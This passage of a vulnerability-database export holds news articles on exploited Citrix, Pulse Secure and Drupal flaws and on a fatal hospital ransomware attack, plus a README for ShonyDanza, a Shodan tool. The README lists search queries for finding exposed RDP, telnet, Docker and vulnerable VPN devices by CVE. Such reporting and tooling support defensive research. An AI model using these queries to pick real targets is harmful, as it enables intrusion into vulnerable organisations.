"integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-04-17T11:20:00", "type": "thn", "title": "CISA Warns Patched Pulse Secure VPNs Could Still Expose Organizations to Hackers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510"], "modified": "2020-04-17T11:20:03", "id": "THN:46994B7A671ED65AD9975F25F514C6E3", "href": "https://thehackernews.com/2020/04/pulse-secure-vpn-vulnerability.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:40:08", "description": "[](<https://thehackernews.com/images/-YFnAQDBLWlw/X2h9bFB25hI/AAAAAAAAAyE/jMecIXHH_sMcXYoQN-b9qTiy868SAREGgCLcBGAsYHQ/s728/ransomware-attack-on-hospital.jpg>)\n\n \nGerman authorities last week [disclosed](<https://apnews.com/cf8f8eee1adcec69bcc864f2c4308c94>) that a ransomware attack on the University Hospital of D\u00fcsseldorf (UKD) caused a failure of IT systems, resulting in the death of a woman who had to be sent to another hospital that was 20 miles away.\n\nThe incident marks the first recorded casualty as a consequence of cyberattacks on critical healthcare facilities, which has ramped up in recent months.\n\nThe attack, which exploited a Citrix ADC [CVE-2019-19781](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>) vulnerability to cripple the hospital systems on September 10, is said to have been \"misdirected\" in that it was originally intended for Heinrich Heine University, according to an extortion note left by the perpetrators.\n\nAfter law enforcement contacted the threat actors and informed them that they had encrypted a hospital, the operators behind the attack withdrew the ransom demand and provided the decryption key.\n\nThe case is currently being treated as a homicide, BBC News [reported](<https://www.bbc.com/news/technology-54204356>) over the weekend.\n\n### Unpatched Vulnerabilities Become Gateway to Ransomware Attacks\n\nAlthough several ransomware gangs said early on in the pandemic that they would not deliberately [target hospitals or medical facilities](<https://thehackernews.com/2016/11/hospital-cyber-attack-virus.html>), the recurring attacks [prompted the Interpol](<https://thehackernews.com/2020/04/cronavirus-hackers.html>) to issue a warning cautioning hospitals against ransomware attacks designed to lock them out of their critical systems in an attempt to extort payments.\n\nWeak credentials and VPN vulnerabilities have proven to be a blessing in disguise for threat actors to break into the internal networks of businesses and organizations, leading cybersecurity agencies in the U.S. and U.K. to publish [multiple](<https://thehackernews.com/2020/09/iranian-hackers-sanctioned.html>) [advisories](<https://www.ncsc.gov.uk/news/citrix-alert>) about active exploitation of the flaws.\n\n\"The [Federal Office for Information Security] is becoming increasingly aware of incidents in which Citrix systems were compromised before the security updates that were made available in January 2020 were installed,\" the German cybersecurity agency [said](<https://www.bsi.bund.de/DE/Presse/Pressemitteilungen/Presse2020/UKDuesseldorf_170920.html>) in an alert last week.\n\n\"This means that attackers still have access to the system and the networks behind it even after the security gap has been closed. This possibility is currently increasingly being used to carry out attacks on affected organizations.\"\n\nThe development also coincides with a fresh [advisory](<https://www.ncsc.gov.uk/news/alert-targeted-ransomware-attacks-on-uk-education-sector>) from the U.K. National Cyber Security Centre (NCSC), which said it's observed an uptick in ransomware incidents targeting educational institutions at least since August 2020, while urging schools and universities to implement a \"defence in depth\" strategy to defend against such malware attacks.\n\nSome of the affected institutions included [Newcastle](<https://www.ncl.ac.uk/itservice/latest-news/>) and [Northumbria](<https://www.bbc.com/news/uk-england-tyne-53989404>) Universities, among others.\n\nCiting Remote Desktop Protocol (RDP), vulnerable software or hardware, and email phishing as the three most common infection vectors, the agency [recommended](<https://blog.emsisoft.com/en/36921/8-critical-steps-to-take-after-a-ransomware-attack-ransomware-response-guide-for-businesses/>) organizations to maintain up-to-date offline backups, adopt endpoint malware protection, secure RDP services using multi-factor authentication, and have an effective patch management strategy in place.\n\n### A Spike in Ransomware Infections\n\nIf anything, the ransomware crisis seems to be only getting worse. [Historical data](<https://sites.temple.edu/care/ci-rw-attacks/>) gathered by Temple University's CARE cybersecurity lab has shown that there have been a total of 687 publicly disclosed cases in the U.S. since 2013, with 2019 and 2020 alone accounting for more than half of all reported incidents (440).\n\nGovernment facilities, educational institutions, and healthcare organizations are the most frequently hit sectors, as per the analysis.\n\nAnd if 2020 is any indication, attacks against colleges and universities are showing no signs of slowing down.\n\n[](<https://thehackernews.com/images/-w1AP-pVwnR0/X2h7szFvYJI/AAAAAAAAAx4/R2M_VI5F2gUCV9Dq0WYitww8OQ_Uz2P1gCLcBGAsYHQ/s0/ransomware-malware-attack-on-universities.jpg>)\n\nAllan Liska, a threat intelligence analyst at Recorded Future, revealed there had been at least 80 publicly reported ransomware infections targeting the education sector to date this year, a massive jump from 43 ransomware attacks for the whole of 2019.\n\n\"Part of this change can be attributed to extortion sites, which force more victims to announce attacks,\" Liska said in a [tweet](<https://twitter.com/uuallan/status/1307684719593746432>). \"But, in general, ransomware actors have more interest in going after colleges and universities, and they are often easy targets.\"\n\nYou can read more about NCSC's mitigation measures [here](<https://www.ncsc.gov.uk/guidance/mitigating-malware-and-ransomware-attacks>). For more guidance on proofing businesses against ransomware attacks, head to US Cybersecurity Security and Infrastructure Security Agency's response guide [here](<https://us-cert.cisa.gov/security-publications/Ransomware>).\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-09-21T10:20:00", "type": "thn", "title": "A Patient Dies After Ransomware Attack Paralyzes German Hospital Systems", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-09-21T10:34:14", "id": "THN:EB3F9784BB2A52721953F128D1B3EAEC", "href": "https://thehackernews.com/2020/09/a-patient-dies-after-ransomware-attack.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:38:52", "description": "[](<https://thehackernews.com/images/-C3dSDFvJiqA/XiW3-49gerI/AAAAAAAABUA/ZZoejAM3OJUPzdMEoE_ef-Wyi7-BtaokACLcBGAsYHQ/s728-e100/Citrix-ADC-Gateway-hacking.jpg>)\n\nCitrix has finally started rolling out security patches for a critical [vulnerability in ADC and Gateway](<https://thehackernews.com/2020/01/citrix-adc-gateway-exploit.html>) software that attackers started exploiting in the wild earlier this month after the company announced the existence of the issue without releasing any permanent fix. \n \nI wish I could say, \"better late than never,\" but since hackers don't waste time or miss any opportunity to exploit vulnerable systems, even a short window of time resulted in the compromise of hundreds of Internet exposed Citrix ADC and Gateway systems. \n \nAs explained earlier on The Hacker News, the vulnerability, tracked as **CVE-2019-19781**, is a path traversal issue that could allow unauthenticated remote attackers to execute arbitrary code on several versions of Citrix ADC and Gateway products, as well as on the two older versions of Citrix SD-WAN WANOP. \n \nRated critical with CVSS v3.1 base score 9.8, the issue was discovered by Mikhail Klyuchnikov, a security researcher at Positive Technologies, who responsibly reported it to Citrix in early December. \n \nThe vulnerability is actively being exploited in the wild since last week by dozens of hacking groups and individual attackers\u2014thanks to the public release of multiple [proofs-of-concept exploit code](<https://thehackernews.com/2020/01/citrix-adc-gateway-exploit.html>). \n \nAccording to cyber security [experts](<https://twitter.com/0xDUDE/status/1218988914272362496?s=08>), as of today, there are over 15,000 publicly accessible vulnerable Citrix ADC and Gateway servers that attackers can exploit overnight to target potential enterprise networks. \n \nFireEye experts found an attack campaign where someone was compromising vulnerable Citrix ADCs to install a previously-unseen payload, dubbed \"[NotRobin](<https://www.fireeye.com/blog/threat-research/2020/01/vigilante-deploying-mitigation-for-citrix-netscaler-vulnerability-while-maintaining-backdoor.html>),\" that scans systems for cryptominers and malware deployed by other potential attackers and removes them to maintain exclusive backdoor access. \n \n\n\n> [#Citrix](<https://twitter.com/hashtag/Citrix?src=hash&ref_src=twsrc%5Etfw>) released a free tool that analyzes available log sources and system forensic artifacts to identify whether an ADC appliance has potentially been compromised using CVE-2019-19781 security flaw. \n \nYou can find the tool and instructions here: <https://t.co/eewijzI2l9>[#infosec](<https://twitter.com/hashtag/infosec?src=hash&ref_src=twsrc%5Etfw>) <https://t.co/YKMwgPzmYE>\n> \n> \u2014 The Hacker News (@TheHackersNews) [January 22, 2020](<https://twitter.com/TheHackersNews/status/1219994163581554689?ref_src=twsrc%5Etfw>)\n\n \n \n\"This actor exploits NetScaler devices using CVE-2019-19781 to execute shell commands on the compromised device,\" FireEye said. \n \n\"FireEye believes that the actor behind NOTROBIN has been opportunistically compromising NetScaler devices, possibly to prepare for an upcoming campaign. They remove other known malware, potentially to avoid detection by administrators.\" \n \n\n\n## Citrix Patch Timeline: Stay Tuned for More Software Updates!\n\n \nLast week Citrix [announced a timeline](<https://twitter.com/TheHackersNews/status/1216239812249702401>), promising to release patched firmware updates for all supported versions of ADC and Gateway software before the end of January 2020, as shown in the chart. \n\n\n[](<https://thehackernews.com/images/-GFKY1pukwgU/XiWsvTjWRzI/AAAAAAAABT0/6B9St94Mff0LZyZw6yzG2oMefLn6gMgGACLcBGAsYHQ/s728-e100/Citrix-ADC-Gateway.jpg>)\n\nAs part of its [first batch of updates](<https://www.citrix.com/blogs/2020/01/19/vulnerability-update-first-permanent-fixes-available-timeline-accelerated/>), Citrix today released permanent patches for ADC versions 11.1 and 12.0 that also apply to \"ADC and Gateway VPX hosted on ESX, Hyper-V, KVM, XenServer, Azure, AWS, GCP or on a Citrix ADC Service Delivery Appliance (SDX).\" \n \n\"It is necessary to upgrade all Citrix ADC and Citrix Gateway 11.1 instances (MPX or VPX) to build 11.1.63.15 to install the security vulnerability fixes. It is necessary to upgrade all Citrix ADC and Citrix Gateway 12.0 instances (MPX or VPX) to build 12.0.63.13 to install the security vulnerability fixes,\" Citrix said in its advisory. \n \n\"We urge customers to install these fixes immediately,\" the company said. \"If you have not already done so, you need to apply the previously supplied mitigation to ADC versions 12.1, 13, 10.5, and SD-WAN WANOP versions 10.2.6 and 11.0.3 until the fixes for those versions are available.\" \n \nThe company also warned that customers with multiple ADC versions in production must apply the correct version of patch to each system separately. \n \nBesides installing available patches for supported versions and applying the recommended mitigation for unpatched systems, Citrix ADC administrators are also advised to monitor their device logs for attacks. \n \n**UPDATE \u2014 **Citrix on Thursday also released [second batch of permanent security patches](<https://www.citrix.com/blogs/2020/01/23/fixes-now-available-for-citrix-adc-citrix-gateway-versions-12-1-and-13-0/>) for critical RCE vulnerability affecting ADC and Gateway versions 12.1 and 13.0.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-20T14:24:00", "type": "thn", "title": "Citrix Releases Patches for Critical ADC Vulnerability Under Active Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-24T07:05:37", "id": "THN:166AAAF7F04EF01C9E049500387BD1FD", "href": "https://thehackernews.com/2020/01/citrix-adc-patch-update.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:38:53", "description": "[](<https://thehackernews.com/images/-_9-nocA92TI/XhmeU1ZwSqI/AAAAAAAA2KQ/m0YexAlFrVQzvw1H2fYT8uoiFY33g82DQCLcBGAsYHQ/s728-e100/citrix-adc-gateway-vulnerability.jpg>)\n\nIt's now or never to prevent your enterprise servers running vulnerable versions of Citrix application delivery, load balancing, and Gateway solutions from getting hacked by remote attackers. \n \nWhy the urgency? Earlier today, multiple groups publicly released weaponized proof-of-concept exploit code [[1](<https://github.com/trustedsec/cve-2019-19781>), [2](<https://github.com/projectzeroindia/CVE-2019-19781>)] for a recently disclosed remote code execution vulnerability in Citrix's NetScaler ADC and Gateway products that could allow anyone to leverage them to take full control over potential enterprise targets. \n \nJust before the last Christmas and year-end holidays, Citrix [announced](<https://support.citrix.com/article/CTX267027>) that its Citrix Application Delivery Controller (ADC) and Citrix Gateway are vulnerable to a critical path traversal flaw (CVE-2019-19781) that could allow an unauthenticated attacker to perform arbitrary code execution on vulnerable servers. \n \nCitrix confirmed that the flaw affects all supported version of the software, including: \n \n\n\n * Citrix ADC and Citrix Gateway version 13.0 all supported builds\n * Citrix ADC and NetScaler Gateway version 12.1 all supported builds\n * Citrix ADC and NetScaler Gateway version 12.0 all supported builds\n * Citrix ADC and NetScaler Gateway version 11.1 all supported builds\n * Citrix NetScaler ADC and NetScaler Gateway version 10.5 all supported builds\n \nThe company made the disclose without releasing any security patches for vulnerable software; instead, [Citrix offered mitigation](<https://support.citrix.com/article/CTX267679>) to help administrators guard their servers against potential remote attacks\u2060\u2014and even at the time of writing, there's no patch available almost 23 days after disclosure. \n \n\n\n \nThrough the cyberattacks against vulnerable servers were [first seen in the wild](<https://twitter.com/sans_isc/status/1213228049011007489>) last week when hackers developed private exploit after reverse engineering mitigation information, the public release of weaponized PoC would now make it easier for low-skilled script kiddies to launch cyberattacks against vulnerable organizations. \n \nAccording to [Shodan](<https://beta.shodan.io/search/facet?query=http.waf%3A%22Citrix+NetScaler%22&facet=org>), at the time of writing, there are over 125,400 Citrix ADC or Gateway servers publicly accessible and can be exploited overnight if not taken offline or protected using available mitigation. \n \nWhile discussing [technical details](<https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/>) of the flaw in a blog post published yesterday, MDSsec also released a video demonstration of the exploit they developed but chose not to release it at this moment. \n \nBesides applying the recommended mitigation, Citrix ADC administrators are also advised to monitor their device logs for attacks.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-11T10:21:00", "type": "thn", "title": "PoC Exploits Released for Citrix ADC and Gateway RCE Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-11T10:22:37", "id": "THN:6ED39786EE29904C7E93F7A0E35A39CB", "href": "https://thehackernews.com/2020/01/citrix-adc-gateway-exploit.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:40:30", "description": "[](<https://thehackernews.com/images/-gX6_9UgesoQ/WxZDSXy_kxI/AAAAAAAAw7s/DgAtVJgBWSMc7xSNuowSunrFzg-X0mqrQCLcBGAs/s728-e100/drupal-hacking.png>)\n\nHundreds of thousands of websites running on the Drupal CMS\u2014including those of major educational institutions and government organizations around the world\u2014have been found vulnerable to a [highly critical flaw](<https://thehackernews.com/2018/04/drupal-rce-exploit-code.html>) for which security patches were released almost two months ago. \n \nSecurity researcher Troy Mursch scanned the whole Internet and [found](<https://badpackets.net/over-100000-drupal-websites-vulnerable-to-drupalgeddon-2-cve-2018-7600/>) over 115,000 Drupal websites are still vulnerable to the Drupalgeddon2 flaw despite repetitive warnings. \n \n[Drupalgeddon2](<https://thehackernews.com/2018/04/drupal-rce-exploit-code.html>) (CVE-2018-7600) is a highly critical remote code execution vulnerability discovered late March in Drupal CMS software (versions &lt; 7.58 / 8.x &lt; 8.3.9 / 8.4.x &lt; 8.4.6 / 8.5.x &lt; 8.5.1) that could allow attackers to completely take over vulnerable websites. \n \nFor those unaware, Drupalgeddon2 allows an unauthenticated, remote attacker to execute malicious code on default or standard Drupal installations under the privileges of the user. \n \nSince Drupalgeddon2 had much potential to derive attention of motivated attackers, the company urged all website administrators to install security patches immediately after it was released in late March and decided not to release any technical details of the flaw initially. \n\n\n[](<https://thehackernews.com/images/-qvQEU0cUz6E/WxY-T5CZxNI/AAAAAAAAw7U/EIiGG2uydmwMhw368wlEM0s5XzpFMGG8ACLcBGAs/s728-e100/drupal-hacking-exploit.png>)\n\nHowever, attackers started exploiting the vulnerability only two weeks after complete details and proof-of-concept (PoC) [exploit code of Drupalgeddon2](<https://thehackernews.com/2018/04/drupal-rce-exploit-code.html>) was published online, which was followed by large-scale Internet scanning and exploitation attempts. \n \nShortly after that, we saw attackers developed [automated exploits](<https://thehackernews.com/2018/04/drupal-rce-exploit-code.html>) leveraging Drupalgeddon 2 vulnerability to inject [cryptocurrency miner](<https://thehackernews.com/2018/04/drupal-cryptocurrency-hacking.html>)s, backdoors, and other malware into websites, within few hours after it's detailed went public. \n \nMursch scanned the Internet and found nearly 500,000 websites were running on Drupal 7, out of which 115,070 were still running an outdated version of Drupal vulnerable to Drupalgeddon2. \n \nWhile analyzing vulnerable websites, Mursch noticed that hundreds of them\u2014including those of Belgium police department, Colorado Attorney General office, Fiat subsidiary Magneti Marelli and food truck locating service\u2014have already been targeted by a new cryptojacking campaign. \n \nMursch also found some infected websites in the campaign that had already upgraded their sites to the latest Drupal version, but the cryptojacking malware still existed. \n \nWe have been warning users since March that if you are already infected with the malware, merely updating your Drupal website would not remove the \"backdoors or fix compromised sites.\" To fully resolve the issue you are recommended to follow this [Drupal guide](<https://www.drupal.org/node/2365547>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-05T08:06:00", "type": "thn", "title": "Over 115,000 Drupal Sites Still Vulnerable to Drupalgeddon2 Exploit", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2018-06-05T08:06:24", "id": "THN:8D76D821D51DF9AAAAF1C9D1FA8CA0C5", "href": "https://thehackernews.com/2018/06/drupalgeddon2-exploit.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "kitploit": [{"lastseen": "2022-04-07T12:01:27", "description": "[](<https://3.bp.blogspot.com/-HfvtRTCYnTM/YZ3QJbhSs3I/AAAAAAAA4AU/kC3BBy581dgTiAKCIDOlmGtohgCXuQhlgCK4BGAYYCw/s1600/ShonyDanza_1_shonydanza_demo-780791.gif>)\n\n \n\n\nA customizable, easy-to-navigate tool for researching, pen testing, and defending with the power of Shodan.\n\n \n\n\nWith ShonyDanza, you can:\n\n * Obtain IPs based on search criteria\n * Automatically exclude honeypots from the results based on your pre-configured thresholds\n * Pre-configure all IP searches to filter on your specified net range(s)\n * Pre-configure search limits\n * Use build-a-search to craft searches with easy building blocks\n * Use stock searches and pre-configure your own stock searches\n * Check if IPs are known [malware](<https://www.kitploit.com/search/label/Malware> \"malware\" ) C2s\n * Get host and domain profiles\n * Scan on-demand\n * Find exploits\n * Get total counts for searches and exploits\n * Automatically save exploit code, IP lists, host profiles, domain profiles, and scan results to directories within ShonyDanza\n\n## Installation\n\n`git clone https://github.com/fierceoj/ShonyDanza.git` \n\n\n> Requirements\n\n * python3\n * shodan library\n\n`cd ShonyDanza` \n`pip3 install -r requirements.txt`\n\n## Usage\n\n> Edit config.py to include your desired configurations \n`cd configs` \n`sudo nano config.py` \n\n \n \n #config file for shonydanza searches \n \n #REQUIRED \n #maximum number of results that will be returned per search \n #default is 100 \n \n SEARCH_LIMIT = 100 \n \n \n #REQUIRED \n #IPs exceeding the honeyscore limit will not show up in IP results \n #scale is 0.0 to 1.0 \n #adjust to desired probability to restrict results by threshold, or keep at 1.0 to include all results \n \n HONEYSCORE_LIMIT = 1.0 \n \n \n #REQUIRED - at least one key: value pair \n #add a shodan dork to the dictionary below to add it to your shonydanza stock searches menu \n #see https://github.com/jakejarvis/awesome-shodan-queries for a great source of queries \n #check into \"vuln:\" filter if you have Small Business Plan or higher (e.g., vuln:cve-2019-11510) \n \n STOCK_SEARCHES = { \n 'ANONYMOUS_FTP':'ftp anonymous ok', \n 'RDP':'port:3389 has_screenshot:true', \n 'OPEN_TELNET':'port:23 console gateway -password', \n 'APACHE_DIR_LIST':'http.title:\"Index of / \"', \n 'SPRING_BOOT':'http.favicon.hash:116323821', \n 'HP_PRINTERS':'\"Serial Number:\" \"Built:\" \"Server: HP HTTP\"', \n 'DOCKER_API':'\"Docker Containers:\" port:2375', \n 'ANDROID_ROOT_BRIDGE':'\"Android Debug Bridge\" \"Device\" port:5555', \n 'MONGO_EXPRESS_GUI':'\"Set-Cookie: mongo-express=\" \"200 OK\"', \n 'CVE-2019-11510_PULSE_VPN':'http.html:/dana-na/', \n 'CVE-2019-19781_CITRIX_NETSCALER':'http.waf:\"Citrix NetScaler\"', \n 'CVE-2020-5902_F5_BIGIP':'http.favicon.hash:-335242539 \"3992\"', \n 'CVE-2020-3452_CISCO_ASA_FTD':'200 \"Set-Cookie: webvpn;\"' \n } \n \n \n #OPTIONAL \n #IP or cidr range constraint for searches that return list of IP addresses \n #use comma-separated list to designate multiple (e.g. 1.1.1.1,2.2.0.0/16,3.3.3.3,3.3.3.4) \n \n #NET_RANGE = '0.0.0.0/0' \n \n\n> Run \n`cd ../` \n`python3 shonydanza.py` \n\n\nSee this [how-to article](<https://null-byte.wonderhowto.com/forum/to-use-shonydanza-find-target-and-exploit-0318883/> \"how-to article\" ) for additional usage instruction.\n\n## Legal Disclaimer\n\nThis project is made for educational and ethical [testing](<https://www.kitploit.com/search/label/Testing> \"testing\" ) purposes only. Usage of ShonyDanza for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.\n\n \n \n\n\n**[Download ShonyDanza](<https://github.com/fierceoj/ShonyDanza> \"Download ShonyDanza\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-01T20:30:00", "type": "kitploit", "title": "ShonyDanza - A Customizable, Easy-To-Navigate Tool For Researching, Pen Testing, And Defending With The Power Of Shodan", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-3452", "CVE-2020-5902"], "modified": "2021-12-01T20:30:00", "id": "KITPLOIT:4421457840699592233", "href": "http://www.kitploit.com/2021/12/shonydanza-customizable-easy-to.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-07T12:01:24", "description": "[](<https://blogger.googleusercontent.com/img/a/AVvXsEjG7AfpHcNjkzZMtvplE2bYVsPCgZ1wyo5jesct_CsGBPhciWCUWFhqC4SLSNboL7iPTWtI0RpGyHZQCbSylFXDC1py1fWqO3vCbpVdYDcHTRT2va2EUO1Vp9dPAgOP6FamNin8VZZdxS42vTbMMddcAUnuN5AAWWwfJDH2pfpmQhjA5RV51QbUk8BqJQ=s586>)\n\n \n\n\nA customizable, easy-to-navigate tool for researching, pen testing, and defending with the power of Shodan.\n\n \n\n\nWith ShonyDanza, you can:\n\n * Obtain IPs based on search criteria\n * Automatically exclude honeypots from the results based on your pre-configured thresholds\n * Pre-configure all IP searches to filter on your specified net range(s)\n * Pre-configure search limits\n * Use build-a-search to craft searches with easy building blocks\n * Use stock searches and pre-configure your own stock searches\n * Check if IPs are known [malware](<https://www.kitploit.com/search/label/Malware> \"malware\" ) C2s\n * Get host and domain profiles\n * Scan on-demand\n * Find exploits\n * Get total counts for searches and exploits\n * Automatically save exploit code, IP lists, host profiles, domain profiles, and scan results to directories within ShonyDanza\n\n## Installation\n\n`git clone https://github.com/fierceoj/ShonyDanza.git` \n\n\n> Requirements\n\n * python3\n * shodan library\n\n`cd ShonyDanza` \n`pip3 install -r requirements.txt`\n\n## Usage\n\n> Edit config.py to include your desired configurations \n`cd configs` \n`sudo nano config.py` \n\n\ndictionary below to add it to your shonydanza stock searches menu #see https://github.com/jakejarvis/awesome-shodan-queries for a great source of queries #check into \"vuln:\" filter if you have Small Business Plan or higher (e.g., vuln:cve-2019-11510) STOCK_SEARCHES = { 'ANONYMOUS_FTP':'ftp anonymous ok', 'RDP':'port:3389 has_screenshot:true', 'OPEN_TELNET':'port:23 [console](<https://www.kitploit.com/search/label/Console> \"console\" ) [gateway](<https://www.kitploit.com/search/label/Gateway> \"gateway\" ) -password', 'APACHE_DIR_LIST':'http.title:\"Index of /\"', 'SPRING_BOOT':'http.favicon.hash:116323821', 'HP_PRINTERS':'\"Serial Number:\" \"Built:\" \"Server: HP HTTP\"', 'DOCKER_API':'\"Docker Containers:\" port:2375', 'ANDROID_ROOT_BRIDGE':'\"Android Debug Bridge\" \"Device\" port:5555', 'MONGO_EXPRESS_GUI':'\"Set-Cookie: mongo-express=\" \"200 OK\"', 'CVE-2019-11510_PULSE_VPN':'http.html:/dana-na/', 'CVE-2019-19781_CITRIX_NETSCALER':'http.waf:\"Citrix NetScaler\"', 'CVE-2020-5902_F5_BIGIP':'http.favicon.hash:-335242539 \"3992\"', 'CVE-2020-3452_CISCO_ASA_FTD':'200 \"Set-Cookie: webvpn;\"' } #OPTIONAL #IP or cidr range constraint for searches that return list of IP addresses #use comma-separated list to designate multiple (e.g. 1.1.1.1,2.2.0.0/16,3.3.3.3,3.3.3.4) 